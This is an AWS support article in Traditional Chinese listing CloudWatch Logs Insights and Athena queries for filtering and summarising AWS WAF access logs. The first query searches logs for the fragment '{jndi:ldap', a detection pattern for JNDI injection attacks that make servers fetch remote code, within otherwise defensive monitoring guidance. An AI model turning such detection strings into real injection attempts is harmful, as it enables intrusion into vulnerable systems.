我有哪些選項可以分析存放在 CloudWatch 或 Amazon S3 中的 AWS WAF 日誌?

上次更新日期:2022 年 7 月 11 日

我將 AWS WAF 日誌存放在 Amazon CloudWatch、Amazon Simple Storage Solution (Amazon S3) 或 Amazon S3 中,做為 Amazon Kinesis Data Firehose 交付串流的目的地。我有哪些選項可以分析 AWS WAF 存取日誌。

解決方案

若要分析和篩選特定的日誌請求,針對 CloudWatch 日誌,請使用 Amazon CloudWatch Logs Insights,而針對 Amazon S3 日誌,則請使用 Amazon Athena。

利用 CloudWatch Logs Insights 分析 AWS WAF 存取日誌

  1. 開啟 Amazon CloudWatch 主控台
  2. 在導覽窗格中,選擇 Logs (日誌),然後選擇 Log Insights
  3. Select log group(s) (選取日誌群組) 中,選擇一或多個要查詢的日誌群組,其中包含 AWS WAF 存取日誌。
  4. (選用) 選擇您要查詢之期間的時間範圍。
  5. 使用查詢語法來設計查詢。
  6. 選擇 Run (執行) 以檢視日誌群組的結果。

下列查詢範例可用於篩選出 CloudWatch Logs Insights 的特定資訊:

根據特定字串進行篩選

執行此查詢以根據特定字串來篩選日誌:
注意:請將字串 {jndi:ldap. 取代為您要搜尋的字串。

fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.httpMethod as Method,httpRequest.uri as URI
| parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| filter @message like "{jndi:ldap"
| sort action, URI desc

依主機篩選

執行此查詢,以依主機進行篩選:
注意:請將主機值 www.example.com 取代為您要搜尋的主機。

parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| filter Host = "www.example.com"
| fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.uri as URI

依 POST 請求篩選

執行此查詢,以隔離任何 POST 請求:

parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.httpMethod as Method, httpRequest.uri as URI, httpRequest.requestId as RequestID
| filter httpRequest.httpMethod ="POST"
| display Rule, action, Country, ClientIP, Method, URI, Host, UserAgent, RequestID
| sort Rule, action desc

依 UserAgent 篩選

執行此查詢,以依 UserAgent進行篩選:
注意:請將 User-Agent-Value 取代為您的 UserAgent

parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| filter UserAgent like "<User-Agent-Value>"
| fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.uri as URI

篩選非來自某個國家/地區的請求

執行此查詢,以篩選不是來自特定國家/地區的請求:

fields terminatingRuleId as Rule, action, httpRequest.country as Country, httpRequest.clientIp as ClientIP, httpRequest.uri as URI
| parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| filter Country != "US"
| sort Country, action desc

針對跨網站指令碼或 SQL 隱碼攻擊篩選

執行此查詢,以針對跨網站指令碼或 SQL 隱碼攻擊進行篩選:

fields @timestamp, terminatingRuleId, action, httpRequest.clientIp as ClientIP, httpRequest.country as Country, terminatingRuleMatchDetails.0.conditionType as ConditionType, terminatingRuleMatchDetails.0.location as Location, terminatingRuleMatchDetails.0.matchedData.0 as MatchedData
| filter ConditionType in["XSS","SQL_INJECTION"]

以終止規則為基礎的時間序列

執行此查詢,以根據終止規則篩選時間序列:

#Time Series by Terminating Rule
filter terminatingRuleId = "AWS-AWSManagedRulesCommonRuleSet"
| stats count(*) as requestCount by bin(30m)

依ClientIP、國家/地區、URI 和規則摘要封鎖的請求

執行此查詢,依 ClientIP、國家/地區、URI 和規則摘要封鎖的請求:

fields httpRequest.clientIp as ClientIP, httpRequest.country as Country, httpRequest.uri as URI, terminatingRuleId as Rule
| filter action = "BLOCK"
| stats count(*) as RequestCount by Country, ClientIP, URI, Rule
| sort RequestCount desc

熱門用戶端 IP

執行此查詢,以計算熱門的用戶端 IP:

stats count(*) as RequestCount by httpRequest.clientIp as ClientIP
| sort RequestCount desc

熱門國家/地區

執行此查詢,以計算熱門的國家/地區:

stats count(*) as RequestCount by httpRequest.country as Country
| sort RequestCount desc

熱門主機

執行此查詢,以計算熱門的主機:

parse @message /\{"name":"[Hh]ost\",\"value":\"(?<Host>[^"}]*)/
| stats count(*) as RequestCount by Host
| sort RequestCount desc

熱門方法

執行此查詢,以計算熱門的方法:

stats count(*)as RequestCount by httpRequest.httpMethod as Method
| sort RequestCount desc

熱門終止規則

執行此查詢,以計算熱門的終止規則:

stats count(*) as RequestCount by terminatingRuleId
| sort RequestCount desc

熱門 UserAgents

執行此查詢,以計算熱門的 UserAgents

parse @message /\{"name":"[Uu]ser\-[Aa]gent\",\"value\"\:\"(?<UserAgent>[^"}]*)/
| stats count(*) as RequestCount by UserAgent
| sort RequestCount desc

請求未由 Default_Action 或包含 ALLOW (允許) 動作的規則終止

執行此查詢,以篩選未由 Default_Action或包含 ALLOW (允許) 動作的規則 終止的請求:

fields @timestamp, terminatingRuleId, action, @message
| filter terminatingRuleId != 'Default_Action' and action != 'ALLOW'
| sort @timestamp desc

包含無效 Captcha 權杖的請求

執行此查詢,依包含無效 Captcha 權杖的請求進行篩選:

fields @timestamp, httpRequest.clientIp, httpRequest.requestId, captchaResponse.failureReason, @message
|filter captchaResponse.failureReason ='TOKEN_MISSING'
| sort @timestamp desc

依速率型規則封鎖的請求

執行此查詢,依速率型規則封鎖的請求進行篩選:

fields @timestamp, httpRequest.clientIp, terminatingRuleId, httpRequest.country,@message
| filter terminatingRuleType ="RATE_BASED" ## and webaclId = "arn:aws:wafv2:us-east-1:xxxxxxxx:regional/webacl/waf-test/abcdefghijkl" ## uncomment to filter for specific WebACL
| sort requestCount desc

篩選由 AWS Bot Control (ABC) 偵測到的所有請求

執行此查詢,以篩選由 ABC 偵測到的所有請求:

fields @timestamp, @message
|filter @message like 'awswaf:managed:aws:bot-control'
| parse @message '"labels":[*]' as Labels
| sort @timestamp desc

使用 Amazon Athena 分析 AWS WAF 存取日誌

您可以將 AWS WAF 存取記錄直接開啟至 Amazon S3 儲存貯體。或者,您也可以使用 Amazon Kinesis Data Firehose 交付串流,將您的 AWS WAF 存取日誌交付至 Amazon S3 儲存貯體。若要將日誌存放在 Amazon S3 中,請參閱如何設定 AWS WAF 綜合日誌記錄以將日誌儲存在 Amazon S3 中?

當您的存取日誌位於 Amazon S3 儲存貯體時,請建立 AWS WAF 表格,以使用 Amazon Athena 查詢日誌和篩選各種詳細資訊。

下列查詢範例可用於透過 Athena 查詢 AWS WAF 日誌:

包含 AWS WAF 規則資訊的封鎖請求

執行此 Athena 查詢,以列出所有含 AWS WAF 規則的封鎖請求:

SELECT timestamp,
    action,
    httpsourcename,
    httpsourceid,
    httprequest.requestID,
    httprequest.clientip,
    webaclid,
    terminatingruleid,
    terminatingruletype,
    rulegrouplist,
    terminatingrulematchdetails
FROM "wafv2"."waf_logs"
WHERE ("action" LIKE 'BLOCK')

請求使用者代理程式

執行此 Athena 查詢,以請求使用者代理程式
注意:請將 User-Agent 取代為您的 UserAgent 值。

select n.value, count(n.value) as count
from waf_logs
cross join
unnest(
  cast(
    httprequest.headers as ARRAY(ROW(name VARCHAR, value VARCHAR))
    )
  ) as x(n)
where n.name = 'User-Agent'
group by n.value
ORDER BY count(n.value) DESC

請求 URI

執行此 Athena 查詢,以檢查請求 URI:

SELECT
"httprequest"."uri"
, "count"(*) "count"
FROM
  waf_logs
WHERE ("action" LIKE 'BLOCK')
GROUP BY "httprequest"."uri"
ORDER BY "count" DESC

根據ClientIP 計算封鎖的請求

執行此 Athena 查詢,以根據 ClientIP 和國家/地區檢視封鎖請求的計數:

SELECT
  "httprequest"."clientip"
, "count"(*) "count"
, "httprequest"."country"
FROM
waf_logs
WHERE ("action" LIKE 'BLOCK')
GROUP BY "httprequest"."clientip", "httprequest"."country"
ORDER BY "count" DESC

檢視請求計數

執行此 Athena 查詢,以檢視請求計數:

SELECT 
  "httprequest"."clientip"
, "count"(*) "count"
,"httprequest"."country"
FROM
 waf_logs
WHERE ("action" LIKE
'BLOCK')
GROUP BY
"httprequest"."clientip", "httprequest"."country"
ORDER BY "count" DESC

如需其他 Athena 查詢範例,請參閱 AWS WAF 日誌的查詢範例


此文章是否有幫助?


您是否需要帳單或技術支援?